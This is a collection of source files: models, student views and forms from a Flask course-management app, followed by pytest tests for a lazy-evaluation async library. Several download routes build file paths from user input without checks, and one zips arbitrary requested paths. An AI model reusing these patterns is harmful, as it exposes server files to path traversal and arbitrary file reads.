id = db.Column(db.Integer, primary_key=True)
submission_id = db.Column(db.Integer, db.ForeignKey('submissions.id'))
guid = db.Column(db.Text)
file_name = db.Column(db.String(128))
upload_time = db.Column(db.DateTime)
status = db.Column(db.Boolean)
submission = db.relationship('Submission', backref='attachment', uselist=False)
def __repr__(self):
return '<Attachment %r>' % self.id
class Course(db.Model):
__tablename__ = 'courses'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50))
semester_id = db.Column(db.Integer, db.ForeignKey('semesters.id'))
course_info = db.Column(db.Text)
place = db.Column(db.String(50))
outline = db.Column(db.Text)
credit = db.Column(db.Integer)
teamsize_max = db.Column(db.Integer)
teamsize_min = db.Column(db.Integer)
status = db.Column(db.Boolean)
upload_time = db.Column(db.String(128))
students = db.relationship('Student', secondary=SCRelationship, backref='courses')
teachers = db.relationship('Teacher', secondary=TCRelationship, backref='courses')
no_miss = db.Column(db.Integer)
miss_1 = db.Column(db.Integer)
miss_2 = db.Column(db.Integer)
miss_3 = db.Column(db.Integer)
miss_4 = db.Column(db.Integer)
miss_5 = db.Column(db.Integer)
def __repr__(self):
return '<Course %r>' % self.id
class CourseTime(db.Model):
__tablename__ = 'course_time'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
start_week = db.Column(db.Integer)
start_section = db.Column(db.Integer)
finish_section = db.Column(db.Integer)
def __repr__(self):
return '<CourseTime %r>' % self.id
class Teacher(UserMixin, db.Model):
__tablename__ = 'teachers'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128))
password_hash = db.Column(db.String(128))
teacher_info = db.Column(db.Text)
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def init_teacher():
teacher = Teacher.query.first()
if teacher is None:
teacher = Teacher(id=777)
teacher.password = '<PASSWORD>'
db.session.add(teacher)
db.session.commit()
@staticmethod
def user_type():
return 1
def __repr__(self):
return '<Teacher %r>' % self.id
@login_manager.user_loader
def load_user(user_id):
if 'user_type' not in session:
return None
elif session['user_type'] == 'dean':
temp = DeanInfo.query.get(int(user_id))
elif session['user_type'] == 'teacher':
temp = Teacher.query.get(int(user_id))
elif session['user_type'] == 'student':
temp = Student.query.get(int(user_id))
return temp
class ChatMessage(db.Model):
__tablename__ = 'chat_message'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
student_id = db.Column(db.Integer, db.ForeignKey('students.id')) # 0 表示 invalid, 即不是学生发言,>0 表示发言者,即为学生发言
teacher_id = db.Column(db.Integer, db.ForeignKey('teachers.id')) # 同理,老师发言
time = db.Column(db.DateTime)
content = db.Column(db.String(256)) # 暂定256字
markdown = db.Column(db.Boolean)
student = db.relationship('Student', uselist=False)
teacher = db.relationship('Teacher', uselist=False)
def __repr__(self):
return '<ChatMessage %r>' % self.id
class Attendance(db.Model):
__tablename__ = 'attendance'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
time_begin = db.Column(db.DateTime) # 老师发布签到时间
time_end = db.Column(db.DateTime) # 在此时间内可以签到
info = db.Column(db.Text) # 写点啥
def __repr__(self):
return '<Attendance %r>' % self.id
@property
def order(self):
return Attendance.query.filter_by(course_id=self.course_id).all().index(self)
@staticmethod
def attendance_list(course_id):
attendances = Attendance.query.filter_by(course_id=course_id).all()
order = 1
for attendance in attendances:
attendance.order = order #为返回的 homework 增加 order (顺序) 属性
order += 1
return attendances
class AttendanceStats(db.Model):
__tablename__ = 'attendance_stats'
id = db.Column(db.Integer, primary_key=True)
attendance_id = db.Column(db.Integer, db.ForeignKey('attendance.id'))
student_id = db.Column(db.Integer, db.ForeignKey('students.id'))
time = db.Column(db.DateTime) # 学生签到时间点
def __repr__(self):
return '<AttendanceStats %r>' % self.id
# 加分项
class Plus(db.Model):
__tablename__ = 'plus'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
name = db.Column(db.String(256))
weight = db.Column(db.Integer)
teams = db.relationship('TeamPlus', backref='plus')
class TeamPlus(db.Model):
__tablename__ = 'team_plus'
id = db.Column(db.Integer, primary_key=True)
plus_id = db.Column(db.Integer, db.ForeignKey('plus.id'))
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
score = db.Column(db.Integer)
team = db.relationship('Team', backref='teamplus', uselist=False)
```
#### File: app/student/views.py
```python
import os
import zipfile
import shutil
from flask import render_template, flash, request, redirect, url_for, make_response, send_file, current_app, \
send_from_directory
from flask_login import login_required, current_user
from . import student
from ..auths import UserAuth
from ..models.models import *
from .forms import *
from flask_uploads import UploadNotAllowed
from openpyxl.utils.exceptions import InvalidFileException
import uuid
from config import basedir
from sqlalchemy import or_, and_
from datetime import datetime, timedelta
@student.before_request
@login_required
def before_request():
pass
@student.route('/')
def index():
courses = Student.query.filter_by(id=current_user.id).first().courses
return render_template('student/index.html', courses=courses)
def download_file(directory, filename):
response = make_response(send_from_directory(directory, filename, as_attachment=True))
response.headers["Content-Disposition"] = "attachment; filename={}".format(filename.encode().decode('latin-1'))
return response
# 提供打包的功能,需要根据实际情况修改
# 提供一个filelist,是一个list,包含的是目标多个文件的绝对路径
# output_filename是目标zip的名字
@student.route('/student/*****', methods=['GET'])
@UserAuth.student_course_access
def multi_download():
filelist = request.args.get('filelist')
output_filename = request.args.get('output_filename')
zipf = zipfile.ZipFile(output_filename, 'w')
[zipf.write(filename, filename.rsplit(os.path.sep, 1)[-1]) for filename in filelist]
zipf.close()
response = make_response(send_file(os.path.join(os.getcwd(), output_filename)))
response.headers["Content-Disposition"] = "attachment; filename="+output_filename+";"
return response
@student.route('/student/<course_id>/<file_name>', methods=['GET'])
@UserAuth.student_course_access
def download_resource(course_id, file_name):
# 这里提供的是样例路径,具体根据实际路径修改
# 文件是否存在
if os.path.isfile(os.path.join(os.getcwd(), 'uploads', str(file_name))):
response = make_response(send_file(os.path.join(os.getcwd(), 'uploads', str(file_name))))
else:
flash('选择的文件不存在')
return redirect(url_for('index'))
response.headers["Content-Disposition"] = "attachment; filename="+str(file_name)+";"
return response
def attendance_available(course_id):
attencence_list = Attendance.query.filter_by(course_id=course_id).all()
if not attencence_list:
return False # 没有签到
last_attendance = attencence_list[-1]
if last_attendance.time_end > datetime.now(): # 时间没截止可以签到
_attendance = AttendanceStats.query.filter_by(attendance_id=last_attendance.id, student_id=current_user.id).first()
if not _attendance:
return True
return False
def submit_attendance(course_id):
# 学生查看作业列表
attencence_list = Attendance.query.filter_by(course_id=course_id).all()
if not attencence_list:
flash("当前没有签到", "danger")
return False # 没有签到
last_attendance = attencence_list[-1]
_attendance_available = last_attendance.time_end > datetime.now() # 时间没截止可以签到
if not _attendance_available:
flash("当前没有签到", "danger")
return False
_attendance = AttendanceStats.query.filter_by(attendance_id=last_attendance.id, student_id=current_user.id).first()
if _attendance:
flash("已经签过到", "info")
return False
new_attendance = AttendanceStats()
new_attendance.student_id = current_user.id
new_attendance.time = datetime.now()
new_attendance.attendance_id = last_attendance.id
db.session.add(new_attendance)
db.session.commit()
flash("签到成功", "success")
return True
@student.route('/<course_id>/course', methods=['GET', 'POST'])
@UserAuth.student_course_access
def show_course_info(course_id):
# 学生查看课程信息
course = Course.query.filter_by(id=course_id).first()
outlet_attachment = None
filedir = os.path.join(basedir, 'uploads', str(course_id))
if not os.path.exists(filedir):
os.mkdir(filedir)
for file in os.listdir(filedir):
try:
name, _ = file.split('.')
if name == 'outlet':
outlet_attachment = file
break
except ValueError:
pass
if request.args.get('action') == 'download':
return send_from_directory(filedir, outlet_attachment, as_attachment=True)
if request.form.get('action') == 'sign_up':
submit_attendance(course_id)
_attendance_available = attendance_available(course_id)
return render_template('student/course.html',
course_id=course_id,
course=course,
attendance_available=_attendance_available,
nav='show_course_info',
outlet_attachment=outlet_attachment)
@student.route('/<course_id>/resource', methods=['GET'])
@UserAuth.student_course_access
def show_resource(course_id):
# 学生查看课程资源
course = Course.query.filter_by(id=course_id).first()
path = request.args.get('path')
if not path:
return redirect(url_for('student.show_resource', course_id=course_id, path='/'))
expand_path = os.path.join(current_app.config['UPLOADED_FILES_DEST'], 'resource', course_id, path[1:])
if not os.path.exists(expand_path):
# 没有文件夹?赶紧新建一个,真鸡儿丢人
os.mkdir(expand_path)
if request.args.get('download'):
# 下载
filedir = os.path.join(
current_app.config['UPLOADED_FILES_DEST'],
'resource',
course_id,
path[1:])
filename = request.args.get('filename')
print(filename)
if os.path.exists(os.path.join(filedir, filename)):
return download_file(filedir, filename)
else:
flash('文件不存在!', 'danger')
return redirect(url_for('teacher.manage_resource', course_id=course_id, path=path))
files = []
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
class file_attributes:
name = ""
size = ""
create_time = datetime.min
is_dir = False
is_file = False
def __init__(self, name, size, create_time, is_dir, is_file):
self.name = name
self.size = size
self.create_time = create_time
self.is_dir = is_dir
self.is_file = is_file
for file in os.scandir(expand_path):
time = datetime.fromtimestamp(file.stat().st_mtime)
files.append(file_attributes(file.name, sizeof_fmt(file.stat().st_size), time, file.is_dir(), file.is_file()))
return render_template('student/resource.html', course_id=course_id, course=course, path=path, files=files, nav='show_resource')
@student.route('/<course_id>/grade', methods=['GET', 'POST'])
def team_grade(course_id):
# 给团队打分
team = Team.query.filter_by(owner_id=current_user.id, course_id=course_id).first()
if not team:
team = Team.query.filter_by(course_id=course_id).filter(Team.members.any(student_id=current_user.id)).first()
if not team or not team.status == 2:
flash('你还没有加组/你的组还没通过审批!', 'danger')
return redirect(url_for('student.team_view', course_id=course_id))
# TeamMember.student 用于显示的成绩
student_list = []
# 加入队长ID和队长成绩
student_list.append({'student_id': team.owner_id,
'student_name': team.owner.name,
'student_grade': team.owner_grade})
# student_list用于在打分页面显示分数
for i in team.members:
student_temp = Student.query.filter_by(id=i.student_id).first()
# student_list.append({student_temp.name: i.grade})
student_list.append({'student_id': student_temp.id,
'student_name': student_temp.name,
'student_grade': i.grade})
# 无法打分情况
if request.method == 'POST':
if current_user.id != team.owner_id:
flash('权限不足,只有组长可以打分', 'danger')
return redirect(url_for('student.team_grade', course_id=course_id))
else:
try:
# request.form: {student_id: grade}
sum_total = 0
# 设置队长grade
sum_total += float(request.form.get(str(team.owner_id)))
# 设置队员成绩
for student_t in team.members:
sum_total = sum_total + float(request.form.get(str(student_t.student_id)))
if sum_total == len(student_list):
team.owner_grade = float(request.form.get(str(team.owner_id)))
db.session.add(team)
for student_t in team.members:
student_t.grade = float(request.form.get(str(student_t.student_id)))
db.session.add(student_t)
db.session.commit()
flash('设置成功', 'success')
return redirect(url_for('student.team_grade', course_id=course_id))
else:
flash('所有人的得分系数平均为1', 'danger')
return redirect(url_for('student.team_grade', course_id=course_id))
except ValueError:
flash('不能为空', 'danger')
return redirect(url_for('student.team_grade', course_id=course_id))
return render_template('student/team_score.html', student_list=student_list, course_id=course_id, team=team, nav='team_grade')
@student.route('/<course_id>/teams', methods=['GET', 'POST'])
def team_view(course_id):
form = CreateTeamForm()
# 是不是团队队长
team_owner = Team.query.filter_by(owner_id=current_user.id, course_id=course_id).first()
# 是不是加入了团队
team_joined = TeamMember\
.query\
.filter_by(student_id=current_user.id, status=1)\
.join(Team)\
.filter(Team.course_id == course_id)\
.first()
# 是不是在提交申请状态
team_pending = TeamMember\
.query\
.filter_by(student_id=current_user.id, status=0) \
.join(Team) \
.filter(Team.course_id == course_id) \
.first()
if request.form.get('action') == 'join':
# 加入团队
member_list = TeamMember.query.filter_by(team_id=request.form.get('team_id')).filter_by(status=1).all()
number_of_member = len(member_list)
_course = Course.query.filter_by(id=course_id).first()
if team_owner:
flash('已创建团队,拒绝申请!', 'danger')
elif team_joined:
flash('已加入团队,拒绝申请!', 'danger')
elif number_of_member == _course.teamsize_max - 1:
flash('人数已满,拒绝申请!', 'danger')
elif team_pending:
flash('提交申请待审批,拒绝申请!', 'danger')
else:
teammember = TeamMember()
teammember.team_id = request.form.get('team_id')
teammember.student_id = current_user.id
teammember.status = 0
db.session.add(teammember)
# 学生团队管理要求删除被驳回记录
delete_list = TeamMember.query.filter_by(status=2).filter_by(student_id=current_user.id).all()
for record in delete_list:
db.session.delete(record)
db.session.commit()
flash('申请加入成功!', 'success')
return redirect(url_for('student.team_view', course_id=course_id))
elif request.form.get('action') == 'cancel':
# 取消申请
delete_teammember = TeamMember.query.filter_by(student_id=current_user.id).first()
db.session.delete(delete_teammember)
db.session.commit()
flash('取消成功!', 'success')
return redirect(url_for('student.team_view', course_id=course_id))
if form.validate_on_submit():
# 创建团队
if team_owner:
flash('已创建团队,无法再次创建!', 'danger')
elif team_joined:
flash('已加入团队,无法再次创建!', 'danger')
elif team_pending:
flash('提交申请待审批,拒绝申请!', 'danger')
else:
team = Team()
team.status = 0
team.course_id = course_id
team.owner_id = current_user.id
team.team_name = form.team_name.data
db.session.add(team)
db.session.commit()
delete_list = TeamMember.query.filter_by(status=2).filter_by(student_id=current_user.id).all()
for record in delete_list:
db.session.delete(record)
db.session.commit()
flash('创建团队成功!', 'success')
return redirect(url_for('student.team_view', course_id=course_id))
team_list = Team.query.filter_by(course_id=course_id).filter(or_(Team.status == 0, Team.status == 3)).all()
return render_template('student/team.html',
teams=team_list,
form=form,
course_id=course_id,
unjoinable=team_owner or team_joined or team_pending,
pending=team_pending,
nav='team_view')
@student.route('/<course_id>/my_team', methods=['GET', 'POST'])
def my_team(course_id):
# 团队管理
student_id = current_user.id
team = Team.query.filter_by(owner_id=student_id, course_id=course_id).first() # 测试是不是队长
teammate_list = []
member_status = None
if not team:
# 如果不是队长的话
member = TeamMember \
.query \
.filter_by(student_id=student_id) \
.join(Team, TeamMember.team_id == Team.id)\
.filter(Team.course_id == course_id) \
.first()
if member:
team = Team.query.filter_by(id=member.team_id).first()
member_status = member.status
if team:
teammate_list = team.members
for member in teammate_list:
# if member.status == 2: # 被拒的都滚粗
# teammate_list.remove(member)
# continue
member.real_name = member.student.name # 通过member里的status在前端做通过/拒绝
if team and request.form.get('action'):
if request.form.get('action') == 'accept':
# 接受成员
member = TeamMember.query.filter_by(student_id=request.form.get('member_id')).first()
member.status = 1 # 1: Accepted
db.session.add(member)
db.session.commit()
flash('接受成功', 'success')
elif request.form.get('action') == 'reject':
# 拒绝成员
member = TeamMember.query.filter_by(student_id=request.form.get('member_id')).first()
member.status = 2 # 2: Rejected
db.session.add(member)
db.session.commit()
flash('拒绝成功', 'success')
elif request.form.get('action') == 'submit':
# 提交团队组建申请
_course = Course.query.filter_by(id=course_id).first()
if team.number_of_members + 1 <= _course.teamsize_min:
flash('人数不足', 'danger')
else:
team.status = 1 # 1: pending
for member in teammate_list:
if member.status == 0: # 0: Pending
member.status = 2 # 2: Rejected
db.session.add(member)
db.session.add(team)
db.session.commit()
flash('已提交申请', 'success')
elif request.form.get('action') == 'dismiss':
# 解散团队
for member in teammate_list:
db.session.delete(member)
db.session.delete(team)
db.session.commit()
flash('队伍已解散', 'success')
elif request.form.get('action') == 'reset':
team.status = 0
db.session.add(team)
db.session.commit()
return redirect(url_for('student.my_team', course_id=course_id))
return render_template('student/team_manage.html',
team=team,
course_id=course_id,
member_status=member_status,
nav='my_team')
@student.route('/<int:course_id>/homework')
@UserAuth.student_course_access
def homework(course_id):
# 学生查看作业列表
course = Course.query.filter_by(id=course_id).first()
homework_list = Homework.query.filter_by(course_id=course_id).all()
return render_template('student/homework.html', course_id=course_id, homeworks=homework_list, course=course, nav='homework')
@student.route('/<int:course_id>/homework/<int:homework_id>/attachment/<int:team_id>/#', methods=['GET', 'POST'])
@UserAuth.student_course_access
def download_attachment(course_id, homework_id, team_id, filename):
file_dir = os.path.join(current_app.config['UPLOADED_FILES_DEST'],
str(course_id),
str(homework_id),
str(team_id))
# 取最新的一次上传和上传时的附件
print(team_id)
print(Team.query.filter_by(id=team_id).all())
attachment_previous = Team \
.query \
.filter_by(id=team_id) \
.filter(Team.submissions.any(homework_id=homework_id)) \
.first() \
.submissions[-1] \
.attachment[0]
filename_upload = attachment_previous.file_name
file_uuid = attachment_previous.guid
# 寻找保存目录下的uuid文件
for i in os.listdir(file_dir):
if i.startswith(str(file_uuid)):
os.rename(os.path.join(file_dir, i), os.path.join(file_dir, filename_upload))
return download_file(file_dir, filename_upload)
@student.route('/<int:course_id>/homework/<int:homework_id>', methods=['GET', 'POST'])
@UserAuth.student_course_access
def homework_detail(course_id, homework_id):
# 详细作业信息
form = HomeworkForm()
course = Course.query.filter_by(id=course_id).first()
homework = Homework.query.filter_by(id=homework_id).first()
team = Team.query.filter_by(owner_id=current_user.id, course_id=course_id).first()
# team_list = Team.query.filter_by(course_id=course_id).all()
# team_id_list = [(a.id for a in team_list)]
ren = TeamMember.query.filter_by(student_id=current_user.id).\
filter(TeamMember.team.has(course_id=course_id)).first()
# student_list_query = TeamMember.query.filter(TeamMember.id.in_(team_id_list))
# print(student_list_query)
# student_list = student_list_query.all()
# student_id_list = [(a.id for a in student_list)]
if not team:
if not ren or current_user.id != ren.student_id:
flash('请先加入团队', 'danger')
return redirect(url_for('student.homework', course_id=course_id))
else:
team = ren.team
attempts = len(Submission.query.filter_by(team_id=team.id, homework_id=homework_id).all())
# begin_time = homework.begin_time
# end_time = homework.end_time
#
# if begin_time > datetime.now():
# flash('还没到作业的开始时间!', 'danger')
# return redirect(url_for('student.homework', course_id=course_id))
# if end_time < datetime.now():
# flash('作业结束时间已过!', 'danger')
# return redirect(url_for('student.homework', course_id=course_id))
if form.validate_on_submit():
# 无法提交情况
if current_user.id != team.owner_id:
flash('只有队长可以管理作业!', 'danger')
return redirect(url_for('student.homework', course_id=course_id))
if attempts >= homework.max_submit_attempts:
flash('提交已达最大次数,无法提交', 'danger')
return redirect(url_for('student.homework_detail', course_id=course_id, homework_id=homework_id))
submission = Submission()
submission.homework_id = homework.id
submission.homework_id = homework.id
submission.team_id = team.id
submission.text_content = form.text.data
submission.submitter_id = current_user.id
submission.score = 0
db.session.add(submission)
db.session.commit() # 提交更改 生成submission_1.id
# 每次提交新的作业 都会删除原来的作业附件
path = os.path.join(basedir, 'uploads', str(course_id),
str(homework_id), str(team.id))
# for i in os.listdir(path=path):
# os.remove(os.path.join(path + '\\' + str(i)))
if os.path.exists(path):
shutil.rmtree(path)
if form.homework_up.data:
# 保存到uploads/<course-id>/<homework-id>/<team-id>
guid = uuid.uuid4()
try:
(name_temp, ext) = os.path.splitext(form.homework_up.data.filename)
homework_ups.save(form.homework_up.data,
folder=os.path.join(basedir, 'uploads', str(course_id),
str(homework_id), str(team.id)),
name=str(guid) + ext)
except UploadNotAllowed:
flash('附件上传不允许!', 'danger')
return redirect(url_for('student.homework_detail', course_id=course_id, homework_id=homework_id))
except InvalidFileException:
flash('附件类型不正确!', 'danger')
return redirect(url_for('main.submit_homework', course_id=course_id, homework_id=homework_id))
attachment = Attachment()
attachment.submission_id = submission.id
attachment.guid = str(guid)
attachment.upload_time = datetime.now()
# 保存原文件名和扩展名
attachment.file_name = str(name_temp) + ext
db.session.add(attachment)
db.session.commit()
flash('提交成功!', 'success')
return redirect(url_for('student.homework_detail', course_id=course_id, homework_id=homework_id))
teacher_corrected = False
corrected_file_dir = os.path.join(basedir, 'uploads', str(course_id), str(homework_id))
corrected_file_path = os.path.join(corrected_file_dir, 'teacher_corrected.zip')
if os.path.exists(corrected_file_path):
teacher_corrected = True
if request.args.get('action') == 'download_corrected':
return download_file(corrected_file_dir, 'teacher_corrected.zip')
# 查找上一次提交
submission_previous = Submission\
.query\
.filter_by(team_id=team.id,
homework_id=homework_id)\
.order_by(Submission.id.desc())\
.first()
attachment_previous = None
if submission_previous:
attachment_previous = Attachment.query.filter_by(submission_id=submission_previous.id).first()
# 寻找当前homework
homework_temp = Homework.query.filter_by(id=homework_id).first()
begin_time = homework_temp.begin_time
end_time = homework_temp.end_time
current_time = datetime.now()
return render_template('student/homework_detail.html',
course_id=course_id,
course=course,
homework=homework,
submission_previous=submission_previous,
attachment_previous=attachment_previous,
form=form,
team=team,
attempts=attempts,
teacher_corrected=teacher_corrected,
begin_time=begin_time,
end_time=end_time,
current_time=current_time,
nav='homework')
```
#### File: app/teacher/forms.py
```python
from flask_wtf import FlaskForm
from wtforms import TextAreaField, IntegerField, StringField, SubmitField, SelectField
from wtforms.validators import InputRequired, DataRequired, NumberRange
from flask_uploads import UploadSet
from flask_wtf.file import FileField, FileAllowed, FileRequired
upsr = UploadSet('files', extensions=('xls', 'xlsx', 'pdf', 'doc', 'docx', 'txt', 'zip', '7z', 'rar'))
up_corrected = UploadSet('files', extensions=('zip', 'rar'))
class CourseForm(FlaskForm):
outline = TextAreaField('课程大纲', validators=[InputRequired()])
outlet_attachment = FileField('大纲附件')
teamsize_max = IntegerField('课程人数上限', validators=[DataRequired(), NumberRange(min=1, message='至少需要一个人')])
teamsize_min = IntegerField('课程人数下限', validators=[DataRequired(), NumberRange(min=1, message='至少需要一个人')])
no_miss = IntegerField('全勤分数', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_1 = IntegerField('一次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_2 = IntegerField('两次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_3 = IntegerField('三次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_4 = IntegerField('四次缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
miss_5 = IntegerField('五次及以上缺勤', validators=[InputRequired(), NumberRange(min=0, max=100, message='分数在0-100')])
def validate(self):
if not super(CourseForm, self).validate():
return False
if not self.teamsize_min.data <= self.teamsize_max.data:
self.teamsize_min.errors.append('下限人数不多于上限')
self.teamsize_max.errors.append('上限人数不少于下限')
return False
return True
class HomeworkForm(FlaskForm):
name = StringField('作业名', validators=[DataRequired()])
base_requirement = TextAreaField('作业要求', validators=[DataRequired()])
time = StringField('持续时间', validators=[DataRequired()])
weight = IntegerField('权重', validators=[DataRequired()])
max_submit_attempts = IntegerField('最大提交次数', validators=[DataRequired()])
class UploadResourceForm(FlaskForm):
up = FileField(validators=[
FileAllowed(upsr, u'xls, xlsx, pdf, doc, docx, txt, zip, 7z, rar'),
FileRequired(u'文件未选择!')])
submit = SubmitField(u'上传')
class UploadCorrected(FlaskForm):
up_corrected = FileField(validators=[FileAllowed(up_corrected, u'zip and rar only'),
FileRequired(u'文件未选择!')])
submit = SubmitField(u'上传')
class AcceptTeam(FlaskForm):
id = IntegerField(validators=[InputRequired()])
# button = SubmitField('通过')
class RejectTeam(FlaskForm):
id = IntegerField(validators=[InputRequired()])
# button = SubmitField('拒绝')
reason = TextAreaField('拒绝理由', validators=[InputRequired()])
class MoveForm(FlaskForm):
student = IntegerField('学生id', validators=[DataRequired()])
pending_teams = SelectField('可以加入的组',
choices=[],
coerce=int)
class AttendanceForm(FlaskForm):
info = StringField("备注")
time_delta = IntegerField("签到开放时长")
class PlusForm(FlaskForm):
name = StringField('加分项名', validators=[DataRequired()])
weight = StringField('加分最大分值', validators=[DataRequired()])
``` |
{
"source": "jqqqqqqqqqq/python-lazy-async",
"score": 3
} |
#### File: python-lazy-async/tests/test_all.py
```python
import pytest
import asyncio
from lazy_async import lazy, lazy_property, lazy_async, lazy_property_async
from threading import Thread
import time
class ExampleClass:
def __init__(self):
self.sync_called = 0
self.async_called = 0
self.prop = 'nothing'
@lazy
def func1(self):
time.sleep(5)
self.sync_called += 1
return 'something'
@lazy_async
async def func2(self):
await asyncio.sleep(5)
self.async_called += 1
return 'something'
@lazy
def func3(self):
time.sleep(5)
raise ValueError('SomeException')
@lazy_async
async def func4(self):
await asyncio.sleep(5)
raise ValueError('SomeException')
@lazy_property
def func5(self):
time.sleep(5)
self.sync_called += 1
return self.prop
@func5.setter
def func5(self, value):
self.prop = value
@lazy_property_async
async def func6(self):
await asyncio.sleep(5)
self.async_called += 1
return self.prop
@func6.setter
def func6(self, value):
self.prop = value
def test_something_sync():
test_class = ExampleClass()
test1 = dict()
def start1():
test1[1] = test_class.func1()
def start2():
time.sleep(3)
test1[2] = test_class.func1()
def start3():
time.sleep(10)
test1[3] = test_class.func1()
Thread(target=start1).start()
Thread(target=start2).start()
Thread(target=start3).start()
time.sleep(1)
assert test1 == {}
time.sleep(3)
assert test1 == {}
time.sleep(2)
assert test1 == {1: 'something', 2: 'something'}
time.sleep(5)
assert test1 == {1: 'something', 2: 'something', 3: 'something'}
assert test_class.sync_called == 1
def test_something_async():
test2 = dict()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start1():
test2[1] = await test_class.func2()
async def start2():
await asyncio.sleep(3)
test2[2] = await test_class.func2()
async def start3():
await asyncio.sleep(10)
test2[3] = await test_class.func2()
async def assert1():
await asyncio.sleep(1)
assert test2 == {}
await asyncio.sleep(3)
assert test2 == {}
await asyncio.sleep(2)
assert test2 == {1: 'something', 2: 'something'}
await asyncio.sleep(5)
assert test2 == {1: 'something', 2: 'something', 3: 'something'}
assert test_class.async_called == 1
loop.run_until_complete(asyncio.gather(start1(), start2(), start3(), assert1()))
def test_exception_sync():
test_class = ExampleClass()
def start1():
try:
test_class.func3()
except Exception as e:
assert isinstance(e, ValueError)
def start2():
time.sleep(3)
try:
test_class.func3()
except Exception as e:
assert isinstance(e, ValueError)
def start3():
time.sleep(10)
try:
test_class.func3()
except Exception as e:
assert isinstance(e, ValueError)
Thread(target=start1).start()
Thread(target=start2).start()
Thread(target=start3).start()
time.sleep(11)
def test_exception_async():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
exception_count = 0
async def start1():
try:
await test_class.func4()
except Exception as e:
nonlocal exception_count
exception_count += 1
assert isinstance(e, ValueError)
async def start2():
await asyncio.sleep(3)
try:
await test_class.func4()
except Exception as e:
nonlocal exception_count
exception_count += 1
assert isinstance(e, ValueError)
async def start3():
await asyncio.sleep(10)
try:
await test_class.func4()
except Exception as e:
nonlocal exception_count
exception_count += 1
assert isinstance(e, ValueError)
loop.run_until_complete(asyncio.gather(start1(), start2(), start3()))
assert exception_count == 3
def test_something_property_sync():
test_class = ExampleClass()
test5 = dict()
def start1():
test5[1] = test_class.func5
def start2():
time.sleep(3)
test5[2] = test_class.func5
def start3():
time.sleep(7)
test5[3] = test_class.func5
def start4():
time.sleep(9)
test_class.func5 = 'something'
test5[4] = test_class.func5
def start5():
time.sleep(11)
test5[5] = test_class.func5
Thread(target=start1).start()
Thread(target=start2).start()
Thread(target=start3).start()
Thread(target=start4).start()
Thread(target=start5).start()
time.sleep(1)
assert test5 == {}
time.sleep(3)
assert test5 == {}
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing'}
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing', 3: 'nothing'}
assert test_class.sync_called == 1
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something'}
time.sleep(2)
assert test5 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something', 5: 'something'}
assert test_class.sync_called == 1
def test_something_property_async():
test6 = dict()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start1():
test6[1] = await test_class.func6
async def start2():
await asyncio.sleep(3)
test6[2] = await test_class.func6
async def start3():
await asyncio.sleep(7)
test6[3] = await test_class.func6
async def start4():
await asyncio.sleep(9)
test_class.func6 = 'something'
test6[4] = await test_class.func6
async def start5():
await asyncio.sleep(11)
test6[5] = await test_class.func6
async def assert1():
await asyncio.sleep(1)
assert test6 == {}
await asyncio.sleep(3)
assert test6 == {}
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing'}
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing', 3: 'nothing'}
assert test_class.async_called == 1
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something'}
await asyncio.sleep(2)
assert test6 == {1: 'nothing', 2: 'nothing', 3: 'nothing', 4: 'something', 5: 'something'}
assert test_class.async_called == 1
loop.run_until_complete(asyncio.gather(start1(), start2(), start3(), start4(), start5(), assert1()))
def test_something_sync_crazy():
test_class = ExampleClass()
def start():
assert test_class.func1() == 'something'
[Thread(target=start).start() for _ in range(2000)]
time.sleep(6)
assert test_class.sync_called == 1
def test_something_async_crazy():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start():
assert await test_class.func2() == 'something'
loop.run_until_complete(asyncio.gather(*[start() for _ in range(2000)]))
assert test_class.async_called == 1
def test_something_property_sync_crazy():
test_class = ExampleClass()
count = 0
def start():
nonlocal count
assert test_class.func5 == 'nothing'
count += 1
[Thread(target=start).start() for _ in range(2000)]
time.sleep(15) # safe value due to performance issue
assert count == 2000
assert test_class.sync_called == 1
test_class.func5 = 'something'
count = 0
def start2():
nonlocal count
assert test_class.func5 == 'something'
count += 1
[Thread(target=start2).start() for _ in range(2000)]
time.sleep(15) # safe value due to performance issue
assert count == 2000
assert test_class.sync_called == 1
def test_something_property_async_crazy():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
test_class = ExampleClass()
async def start():
assert await test_class.func6 == 'nothing'
loop.run_until_complete(asyncio.gather(*[start() for _ in range(2000)]))
assert test_class.async_called == 1
test_class.func6 = 'something'
async def start2():
assert await test_class.func6 == 'something'
